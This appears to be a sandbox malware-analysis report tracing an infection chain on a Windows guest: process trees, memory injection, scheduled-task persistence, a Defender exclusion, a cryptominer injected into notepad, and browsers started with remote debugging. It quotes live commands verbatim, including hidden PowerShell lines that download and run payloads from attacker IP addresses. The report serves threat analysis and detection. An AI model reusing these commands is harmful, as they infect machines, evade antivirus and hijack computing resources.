N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 116 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 116 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 116 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4896 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 4896 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 1728 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 1844 wrote to memory of 3108 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1844 wrote to memory of 3108 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4896 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 4896 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 4896 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 1836 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1836 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1836 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 4896 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
PID 4896 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
PID 1988 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 1988 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 1988 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 3108 wrote to memory of 3544 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3108 wrote to memory of 3544 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3544 wrote to memory of 4688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3544 wrote to memory of 4688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4688 wrote to memory of 1596 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4688 wrote to memory of 1596 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4896 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe
PID 4896 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe
PID 4896 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe
PID 3544 wrote to memory of 3384 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4292 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe C:\Windows\SysWOW64\cmd.exe
PID 4292 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe C:\Windows\SysWOW64\cmd.exe
PID 4292 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe C:\Windows\SysWOW64\cmd.exe
PID 4292 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe C:\Windows\SysWOW64\mshta.exe
PID 4292 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe C:\Windows\SysWOW64\mshta.exe
PID 4292 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe C:\Windows\SysWOW64\mshta.exe
PID 2704 wrote to memory of 4500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2704 wrote to memory of 4500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2704 wrote to memory of 4500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3856 wrote to memory of 1844 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 1844 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 1844 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4896 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4896 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4896 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1204 wrote to memory of 692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1204 wrote to memory of 692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1204 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2052 wrote to memory of 3876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2052 wrote to memory of 3876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2052 wrote to memory of 3876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1844 wrote to memory of 3548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE
PID 1844 wrote to memory of 3548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE
PID 1844 wrote to memory of 3548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE
PID 1204 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 8 wrote to memory of 4316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 4316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 4316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4896 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe

"C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D64B.tmp\D64C.tmp\D64D.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\31xayw5v\31xayw5v.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES981.tmp" "c:\Users\Admin\AppData\Local\Temp\31xayw5v\CSC124C6D5AD9C742CBB436A684BDC2DF.TMP"

C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe

"C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn RDgJamaaXU3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\e90hfFDx3.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\e90hfFDx3.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn RDgJamaaXU3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\e90hfFDx3.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE

"C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "cdohBmas9nm" /tr "mshta \"C:\Temp\ScsxbnLrP.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\ScsxbnLrP.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\ProgramData\dxukjxx\gmgc.exe

C:\ProgramData\dxukjxx\gmgc.exe

C:\Windows\System32\notepad.exe

--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40

C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 2356"

C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe

"C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe

C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe

C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3932 -ip 3932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 788

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 2356"

C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5068 -ip 5068

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 792

C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe"

C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FAF5.tmp\FAF6.tmp\FAF7.bat C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 2356"

C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\2CsAdXyX\Anubis.exe""

C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe

"C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb2373cc40,0x7ffb2373cc4c,0x7ffb2373cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1904 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2148 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2248 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3128 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3260 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4456,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4508 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4632 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4636,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4832 /prefetch:8

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 2356"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4972,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5008 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe

"C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ffb22f346f8,0x7ffb22f34708,0x7ffb22f34718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

